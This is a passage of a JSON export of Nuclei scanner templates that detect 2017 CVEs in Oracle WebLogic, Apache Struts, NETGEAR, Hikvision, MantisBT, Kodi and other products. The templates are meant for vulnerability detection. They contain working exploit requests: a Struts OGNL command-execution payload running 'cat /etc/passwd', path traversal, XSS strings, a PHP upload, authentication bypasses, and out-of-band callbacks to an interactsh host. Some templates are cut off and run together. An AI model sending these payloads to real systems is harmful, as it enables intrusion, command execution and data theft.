method: GET\n path:\n - '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}'\n\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n# digest: 4b0a00483046022100a2ead70694f8fbe9b3e3642b2ba252925a11e895d24c116c6fcf822fec79ffc3022100cb724ed9183a630d2b16eb3ad1ea4e8dd9589e0005873b67061634479dbe51eb:922c64590222798bb761d5b6d8e72950", "hash": "e11d738e9bb16cb43aa62a0a61b2825c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff9" }, "name": "CVE-2017-3506.yaml", "content": "id: CVE-2017-3506\n\ninfo:\n name: Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution\n author: pdteam\n severity: high\n description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.\n remediation: |\n Apply the necessary patches or updates provided by Oracle to fix this vulnerability.\n reference:\n - https://hackerone.com/reports/810778\n - https://nvd.nist.gov/vuln/detail/CVE-2017-3506\n - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\n - http://www.securitytracker.com/id/1038296\n - https://github.com/CVEDB/top\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 7.4\n cve-id: CVE-2017-3506\n epss-score: 0.96935\n epss-percentile: 0.99702\n cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: oracle\n product: weblogic_server\n tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle\n\nhttp:\n - raw:\n - |\n POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\n Content-Type: text/xml;charset=UTF-8\n\n \n \n \n \n \n http://{{interactsh-url}}\n \n \n \n \n \n \n \n \n \n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a004730450221009af3dc7a023956f425c329f162e8bf603416c546b1876ce01e72ac09119bc24202205406c351433b267b3312803f8f1cd75b9707dfc851008977f33e4db88e70404d:922c64590222798bb761d5b6d8e72950", "hash": "d445b3e2bffad5dca0caa5ef6e30f392", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ffa" }, "name": "CVE-2017-3528.yaml", "content": "id: CVE-2017-3528\n\ninfo:\n name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.'\n remediation: |\n Apply the necessary patches or updates provided by Oracle to fix the open redirect vulnerability.\n reference:\n - https://blog.zsec.uk/cve-2017-3528/\n - https://www.exploit-db.com/exploits/43592\n - https://nvd.nist.gov/vuln/detail/CVE-2017-3528\n - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\n - http://www.securitytracker.com/id/1038299\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2017-3528\n cwe-id: CWE-601\n epss-score: 0.00865\n epss-percentile: 0.81972\n cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: oracle\n product: applications_framework\n tags: cve,cve2017,oracle,redirect,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh\"\n\n matchers:\n - type: word\n part: body\n words:\n - 'noresize src=\"/\\interact.sh?configName='\n# digest: 4b0a00483046022100af3043267f661047f2abd255139659c6876cf783ed9a49639876eac74d86842f022100e4a34a3823612505eff0f06d3c4e61785f3cd30694b6d799da940a7b4bd501e2:922c64590222798bb761d5b6d8e72950", "hash": "2b54bb59a9f3cc622f8e40ab4310258e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ffb" }, "name": "CVE-2017-4011.yaml", "content": "id: CVE-2017-4011\n\ninfo:\n name: McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized access to sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by McAfee to mitigate the XSS vulnerability.\n reference:\n - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab\n - https://kc.mcafee.com/corporate/index?page=content&id=SB10198\n - https://nvd.nist.gov/vuln/detail/CVE-2017-4011\n - http://www.securitytracker.com/id/1038523\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-4011\n cwe-id: CWE-79\n epss-score: 0.00142\n epss-percentile: 0.49103\n cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mcafee\n product: network_data_loss_prevention\n tags: cve,cve2017,mcafee,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n headers:\n User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n# digest: 4a0a00473045022100b96f472aaedfc274fdfdec8a3b816d78acbc2505300b1d40c565b457822a0cce0220437e462685b9f8c0bc91b355e244b8882fb26379f7d5f3c244f591b218cac549:922c64590222798bb761d5b6d8e72950", "hash": "aa1a01e3e4b5d5605284cb645e16847a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ffc" }, "name": "CVE-2017-5521.yaml", "content": "id: CVE-2017-5521\n\ninfo:\n name: NETGEAR Routers - Authentication Bypass\n author: princechaddha\n severity: high\n description: |\n NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential exposure of sensitive information.\n remediation: |\n Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.\n reference:\n - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/\n - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability\n - https://nvd.nist.gov/vuln/detail/CVE-2017-5521\n - https://www.exploit-db.com/exploits/41205/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2017-5521\n cwe-id: CWE-200\n epss-score: 0.97402\n epss-percentile: 0.99914\n cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netgear\n product: r6200_firmware\n tags: cve,cve2017,auth-bypass,netgear,router,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"right\\\">Router\\\\s*Admin\\\\s*Username<\"\n - \"right\\\">Router\\\\s*Admin\\\\s*Password<\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220475cf79bbd6db0830e43542783b81874242bece61820a7894f583371748f015b02207aa0881723c78483cb50b459bbd5dda2b2da88f94190c04e6c6f5526498b7b3b:922c64590222798bb761d5b6d8e72950", "hash": "f72a324b75658122b857ff338c0cc494", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ffd" }, "name": "CVE-2017-5631.yaml", "content": "id: CVE-2017-5631\n\ninfo:\n name: KMCIS CaseAware - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor.\n reference:\n - https://www.openbugbounty.org/incidents/228262/\n - https://www.exploit-db.com/exploits/42042/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-5631\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-5631\n cwe-id: CWE-79\n epss-score: 0.00286\n epss-percentile: 0.65504\n cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: kmc_information_systems\n product: caseaware\n tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'>\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207d69e52f52d55a7b3f0d17541fe9f915dd4df8934f92181ed2e92d60ac0c7bde022072d4faaaef53a8a71f6ad67625ef5ce22b85459680a16b880dabe2a2c39f4099:922c64590222798bb761d5b6d8e72950", "hash": "3d025b3e6b783196a38d3c36b6caed69", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ffe" }, "name": "CVE-2017-5638.yaml", "content": "id: CVE-2017-5638\n\ninfo:\n name: Apache Struts 2 - Remote Command Execution\n author: Random_Robbie\n severity: critical\n description: |\n Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string.\n impact: |\n Remote attackers can execute arbitrary commands on the target system.\n remediation: |\n Upgrade to Apache Struts 2.3.32 or 2.5.10.1 or apply the necessary patches.\n reference:\n - https://github.com/mazen160/struts-pwn\n - https://isc.sans.edu/diary/22169\n - https://github.com/rapid7/metasploit-framework/issues/8064\n - https://nvd.nist.gov/vuln/detail/CVE-2017-5638\n - http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2017-5638\n cwe-id: CWE-20\n epss-score: 0.97543\n epss-percentile: 0.99995\n cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: struts\n shodan-query: html:\"Apache Struts\"\n tags: cve2017,cve,apache,kev,msf,struts,rce\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd=\"cat /etc/passwd\",#cmds={\"/bin/bash\",\"-c\",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b13a1627744af175b5ff3208123d7121d1993c1da5916daba690480cb512f923022100fbb3814519400f6165a557af4ce8f740fd1f47aead0436e981e555de1894a22d:922c64590222798bb761d5b6d8e72950", "hash": "033ece854d728a0064adff1155688f93", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fff" }, "name": "CVE-2017-5689.yaml", "content": "id: CVE-2017-5689\n\ninfo:\n name: Intel Active Management - Authentication Bypass\n author: pdteam\n severity: critical\n description: |\n Intel Active Management platforms are susceptible to authentication bypass. A non-privileged network attacker can gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability. A non-privileged local attacker can provision manageability features, gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology. The issue has been observed in versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 for all three platforms. Versions before 6 and after 11.6 are not impacted.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the Intel Active Management firmware, potentially leading to unauthorized control of the affected system.\n remediation: |\n Update the Intel Active Management firmware to version 11.6.55, 11.7.55, 11.11.55, 11.0.25, 8.1.71, or 7.1.91 to mitigate the vulnerability.\n reference:\n - https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr\n - https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability\n - https://www.embedi.com/news/mythbusters-cve-2017-5689\n - https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf\n - https://nvd.nist.gov/vuln/detail/cve-2017-5689\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-5689\n epss-score: 0.97395\n epss-percentile: 0.99912\n cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: intel\n product: active_management_technology_firmware\n shodan-query: title:\"Active Management Technology\"\n tags: cve2017,cve,amt,intel,tenable,kev\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /hw-sys.htm HTTP/1.1\n Host: {{Hostname}}\n\n digest-username: admin\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"System Status\"\n - \"Active Management Technology\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c1ebf3bfcfaab0443bed7c0c3767867af141501aac600f4f387e61c7d0dab97c022060fd9aabe9ac1b63059fb46dfa7eb24a6b438f68a5ee9f4f028cb7e65532233c:922c64590222798bb761d5b6d8e72950", "hash": "d31a022c65a936489eba5499aab37a2c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308000" }, "name": "CVE-2017-5982.yaml", "content": "id: CVE-2017-5982\n\ninfo:\n name: Kodi 17.1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.\n remediation: |\n Upgrade Kodi to a version that is not affected by the CVE-2017-5982 vulnerability.\n reference:\n - https://cxsecurity.com/issue/WLB-2017020164\n - https://www.exploit-db.com/exploits/41312/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-5982\n - https://lists.debian.org/debian-lts-announce/2024/01/msg00009.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-5982\n cwe-id: CWE-22\n epss-score: 0.0372\n epss-percentile: 0.91582\n cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: kodi\n product: kodi\n tags: cve2017,cve,kodi,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100fa4dbd08aff64d97403d7fb368e7231d1a0730e75422275f56f2de2d62285992022100d2b8678f5fb9dc8a061deabd9eaf63b6ee9db983944639a0c7d1fe041ac49d57:922c64590222798bb761d5b6d8e72950", "hash": "539b25c38b3a55c2bb859e832c1e9c90", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308001" }, "name": "CVE-2017-6090.yaml", "content": "id: CVE-2017-6090\n\ninfo:\n name: PhpColl 2.5.1 Arbitrary File Upload\n author: pikpikcu\n severity: high\n description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system.\n remediation: |\n Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability.\n reference:\n - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-6090\n - https://www.exploit-db.com/exploits/42934/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2017-6090\n cwe-id: CWE-434\n epss-score: 0.97204\n epss-percentile: 0.99787\n cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: phpcollab\n product: phpcollab\n shodan-query: http.title:\"PhpCollab\"\n tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive\n\nhttp:\n - raw:\n - |\n POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137\n\n -----------------------------154934846911423734231554128137\n Content-Disposition: form-data; name=\"upload\"; filename=\"{{randstr}}.php\"\n Content-Type: application/x-php\n\n \n\n -----------------------------154934846911423734231554128137--\n - |\n GET /logos_clients/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"48dbd2384cb6b996fa1e2855c7f0567f\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210082359a86174a4f722113b6f6cb2339f0f2892f7a6860cc5272cdd6b668b345e202202711db56d7104f7f16cc78a571e79c7b1befe15bed8c5524b6dad8082dbae73b:922c64590222798bb761d5b6d8e72950", "hash": "22ae3f5d57305a49ed615a1bf85a2fa7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308002" }, "name": "CVE-2017-7269.yaml", "content": "id: CVE-2017-7269\n\ninfo:\n name: Windows Server 2003 & IIS 6.0 - Remote Code Execution\n author: thomas_from_offensity,geeknik\n severity: critical\n description: |\n Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with \"If \", dasl)\n - regex(\"[\\d]+(,\\s+[\\d]+)?\", dav)\n - regex(\".*?PROPFIND\", public)\n - regex(\".*?PROPFIND\", allow)\n condition: or\n\n - type: word\n part: header\n words:\n - \"IIS/6.0\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022022020aa8a873fc818a13eee28f236f26cae0b0aa75204ada8c216d36f82b6d7c022027edcd8a1cc6e78bf98d96759d25094658fc6bce1a48f195a363cece01b7f99c:922c64590222798bb761d5b6d8e72950", "hash": "531d22f0d2a903b9b046fa9e02349223", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308003" }, "name": "CVE-2017-7391.yaml", "content": "id: CVE-2017-7391\n\ninfo:\n name: Magmi 0.7.22 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Magmi or apply the necessary security patches to mitigate the XSS vulnerability.\n reference:\n - https://github.com/dweeves/magmi-git/issues/522\n - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip\n - https://github.com/dweeves/magmi-git/pull/525\n - https://nvd.nist.gov/vuln/detail/CVE-2017-7391\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-7391\n cwe-id: CWE-79\n epss-score: 0.00195\n epss-percentile: 0.56428\n cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: magmi_project\n product: magmi\n tags: cve2017,cve,magmi,xss,magmi_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"><'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220255b4c36fbfca640300f406d76a18de517faa9583bb267338fc7a2d4b36ac070022100e236f6809fd321445907dbc37b9c4def04ad09fc52f798e4324fa84812fd5331:922c64590222798bb761d5b6d8e72950", "hash": "3bd71b98058a4343c602bb3424245c27", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308004" }, "name": "CVE-2017-7615.yaml", "content": "id: CVE-2017-7615\n\n# THIS TEMPLATE IS ONLY FOR DETECTING\n# To carry out further attacks, please see reference[2] below.\n# This template works by guessing user ID.\n# MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1].\ninfo:\n name: MantisBT <=2.30 - Arbitrary Password Reset/Admin Access\n author: bp0lr,dwisiswant0\n severity: high\n description: |\n MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized password resets and unauthorized administrative access.\n remediation: |\n Upgrade MantisBT to a version higher than 2.30 to mitigate this vulnerability.\n reference:\n - https://sourceforge.net/projects/mantisbt/files/mantis-stable/\n - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt\n - https://www.exploit-db.com/exploits/41890\n - http://www.openwall.com/lists/oss-security/2017/04/16/2\n - https://nvd.nist.gov/vuln/detail/CVE-2017-7615\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2017-7615\n cwe-id: CWE-640\n epss-score: 0.97404\n epss-percentile: 0.99917\n cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*\n metadata:\n max-request: 5\n vendor: mantisbt\n product: mantisbt\n tags: cve,cve2017,mantisbt,unauth,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/verify.php?id=1&confirm_hash=\"\n - \"{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=\"\n - \"{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=\"\n - \"{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=\"\n - \"{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'\n - 'IceWarp'\n condition: and\n case-insensitive: true\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ecd748d0da7f1f3e5a44b0351d29bf699e21b0bcfd59e00013b81f7dde887d6f02204f738f06eb2c47e277ac21b6bf66fc965783038678586e2b9e397c57124bc240:922c64590222798bb761d5b6d8e72950", "hash": "2bbfe65724bf0c99dd5819de8739b673", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308006" }, "name": "CVE-2017-7921.yaml", "content": "id: CVE-2017-7921\n\ninfo:\n name: Hikvision - Authentication Bypass\n author: princechaddha\n severity: critical\n description: Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices contain an improper authentication issue. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, unauthorized configuration changes, and potential device takeover.\n remediation: |\n Apply the latest firmware update provided by Hikvision to fix the authentication bypass vulnerability.\n reference:\n - http://www.hikvision.com/us/about_10805.html\n - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01\n - https://nvd.nist.gov/vuln/detail/CVE-2017-7921\n - https://ghostbin.com/paste/q2vq2\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2017-7921\n cwe-id: CWE-287\n epss-score: 0.01361\n epss-percentile: 0.85934\n cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: hikvision\n product: ds-2cd2032-i_firmware\n tags: cve,cve2017,auth-bypass,hikvision\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n# digest: 4b0a00483046022100c915ea5b7a67b269e652cfe5189fbeef5beca1a6e3a09c0ee59298ed9bfbede3022100a8f03caa34047f0f2cd4751cf4c772529f216a56e3e91553f99c1a7eef9bd6e4:922c64590222798bb761d5b6d8e72950", "hash": "d70c1e838b3f361d73be663677f12f69", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308007" }, "name": "CVE-2017-7925.yaml", "content": "id: CVE-2017-7925\n\ninfo:\n name: Dahua Security - Configuration File Disclosure\n author: E1A,none\n severity: critical\n description: |\n A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive information, potentially compromising the security of the system.\n remediation: |\n To remediate this vulnerability, ensure that the configuration file is properly secured and access to it is restricted to authorized personnel only.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2017-7925\n - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-02\n - http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php\n classification:\n 